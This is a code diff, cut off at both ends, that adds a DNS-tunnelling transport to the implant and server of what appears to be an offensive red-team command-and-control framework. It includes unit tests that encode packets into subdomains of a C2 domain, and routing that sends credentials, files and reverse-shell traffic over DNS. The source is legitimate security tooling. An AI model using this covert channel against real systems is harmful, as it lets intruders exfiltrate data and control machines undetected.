assert_eq!(dns.record_type, DnsRecordType::A); + } + + #[test] + fn test_new_record_type_aaaa() { + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=aaaa".to_string(), + None, + ) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::AAAA); + } + + #[test] + fn test_new_record_type_txt_default() { + let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_wildcard_uses_fallbacks() { + let dns = + DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + + // Should have fallback servers + assert!(!dns.dns_servers.is_empty()); + // Fallback servers include known DNS resolvers + let has_fallback = dns + .dns_servers + .iter() + .any(|s| s.contains("1.1.1.1") || s.contains("8.8.8.8")); + assert!(has_fallback, "Should have fallback DNS servers"); + } + + #[test] + fn test_new_missing_domain() { + let result = DNS::new("dns://8.8.8.8:53".to_string(), None); + assert!(result.is_err()); + assert!(result + .unwrap_err() + .to_string() + .contains("domain parameter is required")); + } + + #[test] + fn test_new_without_scheme() { + let dns = + DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + } + + // ============================================================ + // DNS Packet Building Tests + // ============================================================ + + #[test] + fn test_build_subdomain_simple() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: "test1234".to_string(), + data: vec![0x01, 0x02], + crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: 
vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should end with base domain + assert!(subdomain.ends_with(".dnsc2.realm.pub")); + + // Should not exceed DNS limits + assert!(subdomain.len() <= MAX_DNS_NAME_LENGTH); + + // Each label should be <= 63 chars + for label in subdomain.split('.') { + assert!( + label.len() <= MAX_LABEL_LENGTH, + "Label too long: {}", + label.len() + ); + } + } + + #[test] + fn test_build_subdomain_label_splitting() { + let dns = DNS { + base_domain: "x.com".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Create a packet with enough data to require label splitting + let packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: 1, + conversation_id: "test1234".to_string(), + data: vec![0xAA; 50], // 50 bytes of data + crc32: DNS::calculate_crc32(&vec![0xAA; 50]), + window_size: 10, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should have multiple labels (dots) + let label_count = subdomain.matches('.').count(); + assert!( + label_count > 1, + "Expected multiple labels, got {}", + label_count + ); + } + + // ============================================================ + // DNS Query Building Tests + // ============================================================ + + #[test] + fn test_build_dns_query_txt() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (query, txid) = dns + .build_dns_query("test.dnsc2.realm.pub") + .expect("should build"); + + // Header should be 12 bytes minimum + assert!(query.len() > 12); + + // Transaction ID should be in first 2 bytes + let query_txid = u16::from_be_bytes([query[0], query[1]]); + assert_eq!(query_txid, txid); + + // Flags should be standard query (0x0100) + assert_eq!(query[2], 
0x01);
+        assert_eq!(query[3], 0x00);
+
+        // Questions count should be 1
+        assert_eq!(query[4], 0x00);
+        assert_eq!(query[5], 0x01);
+    }
+
+    // ============================================================
+    // DNS Response Parsing Tests
+    // ============================================================
+
+    #[test]
+    fn test_parse_dns_response_too_short() {
+        let dns = DNS {
+            base_domain: "".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        let short_response = vec![0u8; 10]; // Less than 12 bytes
+        let result = dns.parse_dns_response(&short_response, 0x1234);
+        assert!(result.is_err());
+    }
+
+    #[test]
+    fn test_parse_dns_response_txid_mismatch() {
+        let dns = DNS {
+            base_domain: "".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        // Response with different transaction ID
+        let mut response = vec![0u8; 20];
+        response[0] = 0x12;
+        response[1] = 0x34; // txid = 0x1234
+
+        let result = dns.parse_dns_response(&response, 0x5678); // Expect 0x5678
+        assert!(result.is_err());
+        assert!(result.unwrap_err().to_string().contains("mismatch"));
+    }
+
+    // ============================================================
+    // Chunk Size Calculation Tests
+    // ============================================================
+
+    #[test]
+    fn test_calculate_max_chunk_size_larger_domain_smaller_chunk() {
+        let dns_short = DNS {
+            base_domain: "x.co".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        let dns_long = DNS {
+            base_domain: "very.long.subdomain.dnsc2.realm.pub".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        let chunk_short = dns_short.calculate_max_chunk_size(10);
+        let chunk_long = dns_long.calculate_max_chunk_size(10);
+
+        // Longer domain leaves less room for data (or same if both exceed available space)
+        assert!(chunk_short >= chunk_long);
+    }
+
+    // ============================================================
+    // Validate and Prepare Chunks Tests
+    // ============================================================
+
+    #[test]
+    fn test_validate_and_prepare_chunks_empty() {
+        let dns = DNS {
+            base_domain: "dnsc2.realm.pub".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&[]).unwrap();
+
+        assert!(chunk_size > 0);
+        assert_eq!(total_chunks, 1); // Even empty data needs 1 chunk
+        // CRC is deterministic - just verify it's calculated
+        assert_eq!(crc, DNS::calculate_crc32(&[]));
+    }
+
+    #[test]
+    fn test_validate_and_prepare_chunks_small_data() {
+        let dns = DNS {
+            base_domain: "dnsc2.realm.pub".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        let data = vec![0xAA; 50];
+        let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&data).unwrap();
+
+        assert!(chunk_size > 0);
+        assert!(total_chunks >= 1);
+        assert_eq!(crc, DNS::calculate_crc32(&data));
+    }
+
+    #[test]
+    fn test_validate_and_prepare_chunks_exceeds_max() {
+        let dns = DNS {
+            base_domain: "dnsc2.realm.pub".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        let huge_data = vec![0xFF; MAX_DATA_SIZE + 1];
+        let result = dns.validate_and_prepare_chunks(&huge_data);
+
+        assert!(result.is_err());
+        assert!(result.unwrap_err().to_string().contains("exceeds maximum"));
+    }
+
+    // ============================================================
+    // Transport Trait Tests
+    // ============================================================
+
+    #[test]
+    fn test_init_creates_empty_transport() {
+        let dns = DNS::init();
+        assert!(dns.base_domain.is_empty());
+        assert!(dns.dns_servers.is_empty());
+        assert!(!dns.is_active());
+    }
+
+    #[test]
+    fn test_is_active_with_config() {
+        let dns = DNS {
+            base_domain: "dnsc2.realm.pub".to_string(),
+            dns_servers: vec!["8.8.8.8:53".to_string()],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        assert!(dns.is_active());
+    }
+
+    #[test]
+    fn test_is_active_empty_domain() {
+        let dns = DNS {
+            base_domain: "".to_string(),
+            dns_servers: vec!["8.8.8.8:53".to_string()],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        assert!(!dns.is_active());
+    }
+
+    #[test]
+    fn test_is_active_no_servers() {
+        let dns = DNS {
+            base_domain: "dnsc2.realm.pub".to_string(),
+            dns_servers: vec![],
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        };
+
+        assert!(!dns.is_active());
+    }
+
+    #[test]
+    fn test_name_returns_dns() {
+        let dns = DNS::init();
+        assert_eq!(dns.name(), "dns");
+    }
+
+    #[test]
+    fn test_list_available() {
+        let dns = DNS::init();
+        let available = dns.list_available();
+        assert_eq!(available, vec!["dns".to_string()]);
+    }
+
+    #[test]
+    fn test_get_type() {
+        let mut dns = DNS::init();
+        assert_eq!(dns.get_type(), beacon::Transport::Dns);
+    }
+
+    // ============================================================
+    // DnsRecordType Tests
+    // ============================================================
+
+    #[test]
+    fn test_dns_record_type_equality() {
+        assert_eq!(DnsRecordType::TXT, DnsRecordType::TXT);
+        assert_eq!(DnsRecordType::A, DnsRecordType::A);
+        assert_eq!(DnsRecordType::AAAA, DnsRecordType::AAAA);
+        assert_ne!(DnsRecordType::TXT, DnsRecordType::A);
+    }
+
+    // ============================================================
+    // Chunk Response Processing Tests
+    // ============================================================
+
+    #[test]
+    fn test_process_chunk_response_invalid_protobuf() {
+        let invalid_data = vec![0xFF, 0xFF, 0xFF];
+        let result = DNS::process_chunk_response(&invalid_data, 1, 10);
+
+        // Should not error, just mark for retry
+        assert!(result.is_ok());
+        let (_acks, nacks) = result.unwrap();
+        assert!(nacks.contains(&1));
+    }
+
+    #[test]
+    fn test_process_chunk_response_valid_status() {
+        // Create a valid STATUS packet with ACKs
+        let status_packet = DnsPacket {
+            r#type: PacketType::Status.into(),
+            sequence: 0,
+            conversation_id: "test".to_string(),
+            data: vec![],
+            crc32: 0,
+            window_size: 10,
+            acks: vec![AckRange {
+                start_seq: 1,
+                end_seq: 3,
+            }],
+            nacks: vec![5, 6],
+        };
+
+        let mut buf = Vec::new();
+        status_packet.encode(&mut buf).unwrap();
+
+        let result = DNS::process_chunk_response(&buf, 1, 10);
+        assert!(result.is_ok());
+
+        let (acks, nacks) = result.unwrap();
+        assert!(acks.contains(&1));
+        assert!(acks.contains(&2));
+        assert!(acks.contains(&3));
+        assert!(nacks.contains(&5));
+        assert!(nacks.contains(&6));
+    }
+}
diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs
index f5d735376..44b51ff39 100644
--- a/implants/lib/transport/src/lib.rs
+++ b/implants/lib/transport/src/lib.rs
@@ -11,6 +11,9 @@ mod dns_resolver;
 #[cfg(feature = "http1")]
 mod http;
 
+#[cfg(feature = "dns")]
+mod dns;
+
 #[cfg(feature = "mock")]
 mod mock;
 #[cfg(feature = "mock")]
@@ -25,6 +28,8 @@ pub enum ActiveTransport {
     Grpc(grpc::GRPC),
     #[cfg(feature = "http1")]
     Http(http::HTTP),
+    #[cfg(feature = "dns")]
+    Dns(dns::DNS),
     #[cfg(feature = "mock")]
     Mock(mock::MockTransport),
     Empty,
@@ -71,6 +76,16 @@ impl Transport for ActiveTransport {
                 return Err(anyhow!("http1 transport not enabled"));
             }
 
+            // 4. DNS
+            s if s.starts_with("dns://") => {
+                #[cfg(feature = "dns")]
+                {
+                    Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?))
+                }
+                #[cfg(not(feature = "dns"))]
+                return Err(anyhow!("DNS transport not enabled"));
+            }
+
             _ => Err(anyhow!("Could not determine transport from URI: {}", uri)),
         }
     }
@@ -81,6 +96,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.claim_tasks(request).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.claim_tasks(request).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.claim_tasks(request).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.claim_tasks(request).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -97,6 +114,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.fetch_asset(request, sender).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.fetch_asset(request, sender).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.fetch_asset(request, sender).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.fetch_asset(request, sender).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -112,6 +131,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.report_credential(request).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.report_credential(request).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.report_credential(request).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.report_credential(request).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -127,6 +148,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.report_file(request).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.report_file(request).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.report_file(request).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.report_file(request).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -142,6 +165,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.report_process_list(request).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.report_process_list(request).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.report_process_list(request).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.report_process_list(request).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -157,6 +182,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.report_task_output(request).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.report_task_output(request).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.report_task_output(request).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.report_task_output(request).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -173,6 +200,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.reverse_shell(rx, tx).await,
             #[cfg(feature = "http1")]
             Self::Http(t) => t.reverse_shell(rx, tx).await,
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.reverse_shell(rx, tx).await,
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.reverse_shell(rx, tx).await,
             Self::Empty => Err(anyhow!("Transport not initialized")),
@@ -185,6 +214,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.get_type(),
             #[cfg(feature = "http1")]
             Self::Http(t) => t.get_type(),
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.get_type(),
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.get_type(),
             Self::Empty => beacon::Transport::Unspecified,
@@ -197,6 +228,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.is_active(),
             #[cfg(feature = "http1")]
             Self::Http(t) => t.is_active(),
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.is_active(),
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.is_active(),
             Self::Empty => false,
@@ -209,6 +242,8 @@ impl Transport for ActiveTransport {
             Self::Grpc(t) => t.name(),
             #[cfg(feature = "http1")]
             Self::Http(t) => t.name(),
+            #[cfg(feature = "dns")]
+            Self::Dns(t) => t.name(),
             #[cfg(feature = "mock")]
             Self::Mock(t) => t.name(),
             Self::Empty => "none",
@@ -222,6 +257,8 @@ impl Transport for ActiveTransport {
         list.push("grpc".to_string());
         #[cfg(feature = "http1")]
         list.push("http".to_string());
+        #[cfg(feature = "dns")]
+        list.push("dns".to_string());
         #[cfg(feature = "mock")]
         list.push("mock".to_string());
         list
@@ -274,6 +311,27 @@ mod tests {
         }
     }
 
+    #[tokio::test]
+    #[cfg(feature = "dns")]
+    async fn test_routes_to_dns_transport() {
+        // DNS URIs should result in the Dns variant
+        let inputs = vec![
+            "dns://8.8.8.8:53?domain=example.com",
+            "dns://*?domain=example.com&type=txt",
+            "dns://1.1.1.1?domain=test.com&type=a",
+        ];
+
+        for uri in inputs {
+            let result = ActiveTransport::new(uri.to_string(), None);
+
+            assert!(
+                matches!(result, Ok(ActiveTransport::Dns(_))),
+                "URI '{}' did not resolve to ActiveTransport::Dns",
+                uri
+            );
+        }
+    }
+
     #[tokio::test]
     #[cfg(not(feature = "grpc"))]
     async fn test_grpc_disabled_error() {
diff --git a/tavern/app.go b/tavern/app.go
index c6c89be32..48e42a948 100644
--- a/tavern/app.go
+++ b/tavern/app.go
@@ -39,6 +39,7 @@ import (
 	"realm.pub/tavern/internal/www"
 	"realm.pub/tavern/tomes"
 
+	_ "realm.pub/tavern/internal/redirectors/dns"
 	_ "realm.pub/tavern/internal/redirectors/grpc"
 	_ "realm.pub/tavern/internal/redirectors/http1"
 )
diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go
index 559185abb..21b96cf30 100644
--- a/tavern/internal/c2/c2pb/c2.pb.go
+++ b/tavern/internal/c2/c2pb/c2.pb.go
@@ -1,7 +1,7 @@
 // Code generated by protoc-gen-go. DO NOT EDIT.
 // versions:
-// protoc-gen-go v1.36.5
-// protoc v3.21.12
+// protoc-gen-go v1.36.11
+// protoc v6.32.0
 // source: c2.proto
 
 package c2pb
@@ -78,6 +78,7 @@ const (
 	Beacon_TRANSPORT_UNSPECIFIED Beacon_Transport = 0
 	Beacon_TRANSPORT_GRPC        Beacon_Transport = 1
 	Beacon_TRANSPORT_HTTP1       Beacon_Transport = 2
+	Beacon_TRANSPORT_DNS         Beacon_Transport = 3
 )
 
 // Enum value maps for Beacon_Transport.
@@ -86,11 +87,13 @@ var ( 0: "TRANSPORT_UNSPECIFIED", 1: "TRANSPORT_GRPC", 2: "TRANSPORT_HTTP1", + 3: "TRANSPORT_DNS", } Beacon_Transport_value = map[string]int32{ "TRANSPORT_UNSPECIFIED": 0, "TRANSPORT_GRPC": 1, "TRANSPORT_HTTP1": 2, + "TRANSPORT_DNS": 3, } ) @@ -1195,170 +1198,103 @@ func (x *ReverseShellResponse) GetData() []byte { var File_c2_proto protoreflect.FileDescriptor -var file_c2_proto_rawDesc = string([]byte{ - 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, - 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, - 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, - 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, - 0x27, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xa6, 0x02, 0x0a, 0x06, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, - 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, - 0x69, 0x65, 0x72, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, - 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, - 0x6c, 0x12, 0x1c, 0x0a, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, - 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x52, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x12, - 0x1f, 0x0a, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x09, - 0x2e, 0x63, 0x32, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x52, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, - 0x12, 0x1a, 0x0a, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x18, 0x05, 0x20, 0x01, - 
0x28, 0x04, 0x52, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x12, 0x32, 0x0a, 0x09, - 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x0e, 0x32, - 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x2e, 0x54, 0x72, 0x61, 0x6e, - 0x73, 0x70, 0x6f, 0x72, 0x74, 0x52, 0x09, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, - 0x22, 0x4f, 0x0a, 0x09, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x19, 0x0a, - 0x15, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, - 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x54, 0x52, 0x41, 0x4e, - 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x47, 0x52, 0x50, 0x43, 0x10, 0x01, 0x12, 0x13, 0x0a, 0x0f, - 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x48, 0x54, 0x54, 0x50, 0x31, 0x10, - 0x02, 0x22, 0xfe, 0x01, 0x0a, 0x04, 0x48, 0x6f, 0x73, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, - 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x2d, - 0x0a, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, - 0x32, 0x11, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x2e, 0x50, 0x6c, 0x61, 0x74, 0x66, - 0x6f, 0x72, 0x6d, 0x52, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x1d, 0x0a, - 0x0a, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x5f, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x49, 0x70, 0x22, 0x74, 0x0a, 0x08, - 0x50, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x18, 0x0a, 0x14, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, - 0x10, 0x00, 0x12, 0x14, 0x0a, 0x10, 
0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x57, - 0x49, 0x4e, 0x44, 0x4f, 0x57, 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, - 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, 0x53, 0x10, 0x03, - 0x12, 0x10, 0x0a, 0x0c, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, - 0x10, 0x04, 0x22, 0x59, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, - 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, 0x04, 0x74, 0x6f, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, - 0x74, 0x63, 0x68, 0x2e, 0x54, 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x12, 0x1d, - 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x1d, 0x0a, - 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, - 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe3, 0x01, 0x0a, - 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, 0x0a, 0x06, 0x6f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6f, 0x75, 0x74, - 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, - 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, 0x78, 0x65, 0x63, - 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 
0x72, 0x6f, 0x74, 0x6f, - 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0d, 0x65, - 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, 0x44, 0x0a, 0x10, - 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x5f, 0x61, 0x74, - 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, - 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, - 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, - 0x41, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, - 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, - 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, 0x34, 0x0a, 0x12, 0x43, - 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, - 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, - 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, - 0x73, 0x22, 0x27, 0x0a, 0x11, 0x46, 